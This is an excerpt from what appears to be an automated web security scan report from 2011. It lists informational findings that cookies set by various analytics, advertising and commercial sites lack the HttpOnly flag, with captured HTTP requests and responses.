12.334. http://my.omniture.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://my.omniture.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

sc_locale=en_US; expires=Wed, 16-Mar-2011 10:59:51 GMT; path=/; domain=.omniture.com
sc_locale_numbers=en_US; expires=Wed, 16-Mar-2011 10:59:51 GMT; path=/; domain=.omniture.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.335. http://network.realmedia.com/RealMedia/ads/adstream_nx.ads/TRACK_Lendingtree/Retargeting_Homepage_Nonsecure@Bottom3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_nx.ads/TRACK_Lendingtree/Retargeting_Homepage_Nonsecure@Bottom3

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

RMFL=011PkerqU10EfJ|U10Eo1|U1014lt|U10166E|U1016Pl; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
NXCLICK2=011PkerqNX_TRACK_Lendingtree/Retargeting_Homepage_Nonsecure!y!B3!16Pl!1MTwg; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
NSC_o1efm_qppm_iuuq=ffffffff09419e0845525d5f4f58455e445a4a423660;expires=Wed, 02-Feb-2011 07:34:34 GMT;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.336. http://omniture.d1.sc.omtrdc.net/b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s11877967668697 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://omniture.d1.sc.omtrdc.net
Path:	/b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s11877967668697

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

s_vi_dfebx7Fx7Eynhdf=[CS]v4|0-0|4D49AEAC[CE]; Expires=Mon, 1 Feb 2016 19:21:16 GMT; Domain=.omtrdc.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.337. http://omniture.d1.sc.omtrdc.net/b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s11877967668697 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://omniture.d1.sc.omtrdc.net
Path:	/b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s11877967668697

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

s_vi=[CS]v1|26A4BD5B8507B97C-40000100200639AF[CE]; Expires=Thu, 2 Feb 2012 15:39:35 GMT; Domain=omniture.d1.sc.omtrdc.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s11877967668697?AQB=1&ndh=1&t=2/1/2011%209%3A40%3A27%203%20360&vmt=4B900D47&vmf=omniturecom.112.2o7.net&ce=UTF-8&ns=omniturecom&cl=31536000&pageName=Privacy%3A%202o7.net%20Explained&g=http%3A//www.omniture.com/en/privacy/2o7%3Ff%3D2o7&cc=USD&ch=Privacy&server=www.omniture.com&v0=natural_bookmark&events=event69&c1=Non-Customer&v1=Non-Customer&v3=Now%20Defined%20by%20Test%20and%20Target&v4=English&c5=Now%20Defined%20by%20Test%20and%20Target&c6=English&c14=http%3A//www.omniture.com/en/privacy/2o7%3Ff%3D2o7&v17=Data%20Not%20Available&v34=natural_bookmark&v35=http%3A//www.omniture.com/en/privacy/2o7%3Ff%3D2o7&c37=natural_bookmark&c38=natural_bookmark&v38=natural_bookmark&v43=natural_bookmark&v50=natural_bookmark&tnt=12765%3A0%3A0%2C7827%3A2%3A0%2C7827%3A2%3A0%2C7827%3A2%3A0%2C&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1036&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: omniture.d1.sc.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/privacy/2o7?f=2o7
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Wed, 02 Feb 2011 15:39:35 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26A4BD5B8507B97C-40000100200639AF[CE]; Expires=Thu, 2 Feb 2012 15:39:35 GMT; Domain=omniture.d1.sc.omtrdc.net; Path=/
Location: http://omniture.d1.sc.omtrdc.net/b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s11877967668697?AQB=1&pccr=true&vidn=26A4BD5B8507B97C-40000100200639AF&&ndh=1&t=2/1/2011%209%3A40%3A27%203%20360&vmt=4B900D47&vmf=omniturecom.112.2o7.net&ce=UTF-8&ns=omniturecom&cl=31536000&pageName=Privacy%3A%202o7.net%20Explained&g=http%3A//www.omniture.com/en/privacy/2o7%3Ff%3D2o7&cc=USD&ch=Privacy&server=www.omniture.com&v0=natural_bookmark&events=event69&c1=Non-Customer&v1=Non-Customer&v3=Now%20Defined%20by%20Test%20and%20Target&v4=English&c5=Now%20Defined%20by%20Test%20and%20Target&c6=English&c14=http%3A//www.omniture.com/en/privacy/2o7%3Ff%3D2o7&v17=Data%20Not%20Available&v34=natural_bookmark&v35=http%3A//www.omniture.com/en/privacy/2o7%3Ff%3D2o7&c37=natural_bookmark&c38=natural_bookmark&v38=natural_bookmark&v43=natural_bookmark&v50=natural_bookmark&tnt=12765%3A0%3A0%2C7827%3A2%3A0%2C7827%3A2%3A0%2C7827%3A2%3A0%2C&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1036&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.3.1
Expires: Tue, 01 Feb 2011 15:39:35 GMT
Last-Modified: Thu, 03 Feb 2011 15:39:35 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www1
Content-Length: 0
Content-Type: text/plain

12.338. http://omniture.d1.sc.omtrdc.net/b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s17696109912358 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://omniture.d1.sc.omtrdc.net
Path:	/b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s17696109912358

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

s_vi=[CS]v1|26A4BD650507A9BE-60000103A0064D41[CE]; Expires=Thu, 2 Feb 2012 15:39:54 GMT; Domain=omniture.d1.sc.omtrdc.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s17696109912358?AQB=1&ndh=1&t=2/1/2011%209%3A40%3A46%203%20360&vmt=4B900D47&vmf=omniturecom.112.2o7.net&ce=UTF-8&ns=omniturecom&cl=31536000&pageName=Omniture%3A%20Homepage&g=http%3A//www.omniture.com/en/&cc=USD&ch=Home&server=www.omniture.com&events=event69&c1=Non-Customer&v1=Non-Customer&v3=Now%20Defined%20by%20Test%20and%20Target&v4=English&c5=Now%20Defined%20by%20Test%20and%20Target&c6=English&c14=http%3A//www.omniture.com/en/&v17=Data%20Not%20Available&v35=http%3A//www.omniture.com/en/&tnt=34252%3A179%3A0%2C34092%3A33%3A0%2C34093%3A0%3A0%2C34091%3A28%3A0%2C&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1036&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: omniture.d1.sc.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Wed, 02 Feb 2011 15:39:54 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26A4BD650507A9BE-60000103A0064D41[CE]; Expires=Thu, 2 Feb 2012 15:39:54 GMT; Domain=omniture.d1.sc.omtrdc.net; Path=/
Location: http://omniture.d1.sc.omtrdc.net/b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s17696109912358?AQB=1&pccr=true&vidn=26A4BD650507A9BE-60000103A0064D41&&ndh=1&t=2/1/2011%209%3A40%3A46%203%20360&vmt=4B900D47&vmf=omniturecom.112.2o7.net&ce=UTF-8&ns=omniturecom&cl=31536000&pageName=Omniture%3A%20Homepage&g=http%3A//www.omniture.com/en/&cc=USD&ch=Home&server=www.omniture.com&events=event69&c1=Non-Customer&v1=Non-Customer&v3=Now%20Defined%20by%20Test%20and%20Target&v4=English&c5=Now%20Defined%20by%20Test%20and%20Target&c6=English&c14=http%3A//www.omniture.com/en/&v17=Data%20Not%20Available&v35=http%3A//www.omniture.com/en/&tnt=34252%3A179%3A0%2C34092%3A33%3A0%2C34093%3A0%3A0%2C34091%3A28%3A0%2C&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1036&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.3.1
Expires: Tue, 01 Feb 2011 15:39:54 GMT
Last-Modified: Thu, 03 Feb 2011 15:39:54 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www29
Content-Length: 0
Content-Type: text/plain

12.339. http://omniture.d1.sc.omtrdc.net/b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s17696109912358 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://omniture.d1.sc.omtrdc.net
Path:	/b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s17696109912358

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

s_vi_dfebx7Fx7Eynhdf=[CS]v4|0-0|4D49AEAC[CE]; Expires=Mon, 1 Feb 2016 19:21:16 GMT; Domain=.omtrdc.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 302 Found
Date: Wed, 02 Feb 2011 19:21:16 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_dfebx7Fx7Eynhdf=[CS]v4|0-0|4D49AEAC[CE]; Expires=Mon, 1 Feb 2016 19:21:16 GMT; Domain=.omtrdc.net; Path=/
Location: http://omniture.d1.sc.omtrdc.net/b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s17696109912358?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.3.1
Expires: Tue, 01 Feb 2011 19:21:16 GMT
Last-Modified: Thu, 03 Feb 2011 19:21:16 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www30
Content-Length: 0
Content-Type: text/plain
Connection: close

12.340. http://omniture.d1.sc.omtrdc.net/b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s21560784257017 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://omniture.d1.sc.omtrdc.net
Path:	/b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s21560784257017

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

s_vi_dfebx7Fx7Eynhdf=[CS]v4|0-0|4D49AEAD[CE]; Expires=Mon, 1 Feb 2016 19:21:17 GMT; Domain=.omtrdc.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.341. http://omniture.d1.sc.omtrdc.net/b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s23100360115058 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://omniture.d1.sc.omtrdc.net
Path:	/b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s23100360115058

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

s_vi_dfebx7Fx7Eynhdf=[CS]v4|0-0|4D49AEAE[CE]; Expires=Mon, 1 Feb 2016 19:21:18 GMT; Domain=.omtrdc.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.342. http://omniture.d1.sc.omtrdc.net/b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s23355576898902 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://omniture.d1.sc.omtrdc.net
Path:	/b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s23355576898902

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

s_vi_dfebx7Fx7Eynhdf=[CS]v4|0-0|4D49AEAD[CE]; Expires=Mon, 1 Feb 2016 19:21:17 GMT; Domain=.omtrdc.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 302 Found
Date: Wed, 02 Feb 2011 19:21:17 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_dfebx7Fx7Eynhdf=[CS]v4|0-0|4D49AEAD[CE]; Expires=Mon, 1 Feb 2016 19:21:17 GMT; Domain=.omtrdc.net; Path=/
Location: http://omniture.d1.sc.omtrdc.net/b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s23355576898902?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.3.1
Expires: Tue, 01 Feb 2011 19:21:17 GMT
Last-Modified: Thu, 03 Feb 2011 19:21:17 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www25
Content-Length: 0
Content-Type: text/plain
Connection: close

12.343. https://omniturebanners.112.2o7.net/b/ss/omniturebanners/1/H.9--NS/0 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://omniturebanners.112.2o7.net
Path:	/b/ss/omniturebanners/1/H.9--NS/0

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

s_vi_x60bafx7Bzx7Djmnaajx7Dx7C=[CS]v4|0-0|4D49AEAF[CE]; Expires=Mon, 1 Feb 2016 19:21:19 GMT; Domain=.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/omniturebanners/1/H.9--NS/0 HTTP/1.1
Host: omniturebanners.112.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.344. http://omtrdc.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://omtrdc.net
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerhttp_omniture=101320202.5892.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: omtrdc.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 02 Feb 2011 15:39:24 GMT
Server: Omniture AWS/2.0.0
Location: http://www.omniture.com/privacy/2o7?f=2o7
Content-Length: 321
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServerhttp_omniture=101320202.5892.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.omniture.com
...[SNIP]...

12.345. http://onlinehelp.microsoft.com/en-us/bing/ff808490.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://onlinehelp.microsoft.com
Path:	/en-us/bing/ff808490.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

A=I&I=AxUFAAAAAADvBwAAMWItHgFApdkzxQaDuho8RA!!&M=1; domain=.microsoft.com; expires=Sat, 02-Feb-2041 15:38:20 GMT; path=/
ADS=SN=175A21EF; domain=.microsoft.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en-us/bing/ff808490.aspx HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.346. http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://onlinehelp.microsoft.com
Path:	/en-us/msn/thebasics.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

A=I&I=AxUFAAAAAAB9BwAAv+cg4N9BcsGpzhmgViEJWQ!!&M=1; domain=.microsoft.com; expires=Sat, 02-Feb-2041 15:38:20 GMT; path=/
ADS=SN=175A21EF; domain=.microsoft.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en-us/msn/thebasics.aspx HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.347. http://orbitz.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://orbitz.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: orbitz.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=8916556551294354144817; OrbitzRegistration="N,0,0,0"; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; PackagingContext=APH; DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296342267897:ss=1296342267897

Response

HTTP/1.1 301 MOVED PERMANENTLY
Location: http://www.orbitz.com/
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

12.348. http://ow.ly/1aWWoA previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ow.ly
Path:	/1aWWoA

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

OWLYSID=3777840d305e9bcf71157d958fdf03738bfaacfe; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1aWWoA HTTP/1.1
Host: ow.ly
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 01 Feb 2011 14:32:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.6
Set-Cookie: OWLYSID=3777840d305e9bcf71157d958fdf03738bfaacfe; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://news.feedzilla.com/en_us/stories/business/markets-emerging-markets/48788011?client_source=feed&format=rss
X-Gridnum: 1
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html

12.349. http://pingomatic.com/ping/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pingomatic.com
Path:	/ping/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

blogurl=http%3A%2F%2Fb2932; expires=Sun, 29-May-2011 15:33:06 GMT; path=/; domain=.pingomatic.com
rssurl=deleted; expires=Tue, 02-Feb-2010 21:46:25 GMT; path=/; domain=.pingomatic.com
title=Flyer; expires=Sun, 29-May-2011 15:33:06 GMT; path=/; domain=.pingomatic.com
pinged=a%3A0%3A%7B%7D; expires=Sun, 29-May-2011 15:33:06 GMT; path=/; domain=.pingomatic.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ping/?title=Flyer&blogurl=b2932 HTTP/1.1
Host: pingomatic.com
Proxy-Connection: keep-alive
Referer: http://medienfreunde.com/lab/innerfade/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Feb 2011 21:46:26 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: blogurl=http%3A%2F%2Fb2932; expires=Sun, 29-May-2011 15:33:06 GMT; path=/; domain=.pingomatic.com
Set-Cookie: rssurl=deleted; expires=Tue, 02-Feb-2010 21:46:25 GMT; path=/; domain=.pingomatic.com
Set-Cookie: title=Flyer; expires=Sun, 29-May-2011 15:33:06 GMT; path=/; domain=.pingomatic.com
Set-Cookie: pinged=a%3A0%3A%7B%7D; expires=Sun, 29-May-2011 15:33:06 GMT; path=/; domain=.pingomatic.com
Content-Length: 1932

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-T
...[SNIP]...

12.350. http://pix04.revsci.net/D08734/a1/0/3/0.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/D08734/a1/0/3/0.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPFeU+FbxIQ1kNYvHseIeEiFPLY3sGlBwefeQGolpUspQOMVXTsemteSudqC0pSV1UN7CZ9KyQiVwn/zK5v5+ZZn71cfM4GDM50Q9Bw8GkAZ6L34ZmFnGKHV8+IM1GCBrxtqctOdKW322q4O2xI0xQVbFabIj862tETQanfX0EDjeVZi1FPBzZhlrQGJeO4blIOojZ1EOdiRWtl2ZtO0tV+rCjUnwLONrvANz8CskgoTzHdE5YQzFjxb1WMuZoF3a1UNiIklxHRD9X1m5TDxPwAUF/RZOro8aE=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:11:18 GMT; Path=/
udm_0=MLvvNSMNLjpn3gfUDF7BVtAE7s3J6sMsniyxP0ZTGyb0XVS2KCsE++vMKpQLnK3thbdS17nLkt+9I3dBJD4N4xnSKIOw4HD33Ndw3hjVKeJM3aPiaeU8exMDPzNyKFLRF3DdxRZ9sIqeEr0SmFCcxSI9dIKQy0cM793jCrbVqYUB2pih6N3lS/5cGPTHtmlDpDvLEriKHIo8fVN6aflYfmlnjFc3B2TTk+L1ZbkqRfqhMSTXblcL09J671ocAbO5eb5JdW0oPODoRSt8qhdsvA4ZM9epbUpgoE4vYUrR/GKSVeHQDsZNx0tyOCaX3w7BKhZ0lSxxpvwAz1Zc2msetwfxBg0EoXYSdlPd7GEv82FoKEV/c2IzOf/oOsPaVuhmcV2LLJSCO0QDGQ8CLW2o8XoqsbL8bodNogQcgbODuI9fNvprOKBAqYBTvIFC4AnRpEm1RrB4KQ70sYNJlkPYOQo3UsN51S/UkNOZxkIHoJXDsx0L0apRXhGxtEov0nVkA4jJw9bvS1FTGnr9Mui7IgnCpiing6ol+IRaug0X/VOOX/YJvEJvQbyTyMthA2vA4zSS3ZCM+kWtfX8Pho+A+ExcSAGgPFLnVXV4fJc5tKUY1FBoDMIN7VayV9LJeHtWbbZpTVyaCEy0X4fPvBLeRZYdpDnYR+LOw5t35v6d96Er6bNeNlAq8P/93JiIIuXStnIOsckpYuEoD+UzM7QfKx1ktCQ0RKXzJYilYm3Z90VH9ONOnzgp3puwhxCmR740VS47A+ixXoDwsI9d4ae9moH/gYnQL/mz+XxfuytLCNDC8+WjYu2gSpUmwDXYaUXo/8eDrdJ7NC1mIlpHsBkSzDN9j0o5t7EtrJXmQ/T/z84aJs9zsXyujZcXNjZsY8Hy9wJbAsfH8Riof6sRz5fLCwTC8veC4wRBxvE4xpciHSP+yNJJi9yBJ/2dCRgVtTqrufLq9EgENIh+mwHUtfRjFPV5xI5tEvinw9OmttRc7Iyk2hrAo9BxjpbiUuzpbtWouUOCs+dHz8uEo18LLwMEFo0u1k3FOWh4E9ED2pPabo4f2s+0yaSN8JYoGPcnWSfVMVS81rJjwNYjPOk3QfI/3IaU3xJWtSrU24BMPMUfpPLVqj4Q/zfcdNOcqMkaLxUEGO8qDFtoGQ2BbMj5JIvC8L/xP8+oSfTcSyBQVUTy5A0KGn7pKOjc2C4Tb9uDqty1Q0yaEAVd7aKc6b7usBbZn/fWLbkwYtBGn302niPv; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:11:18 GMT; Path=/
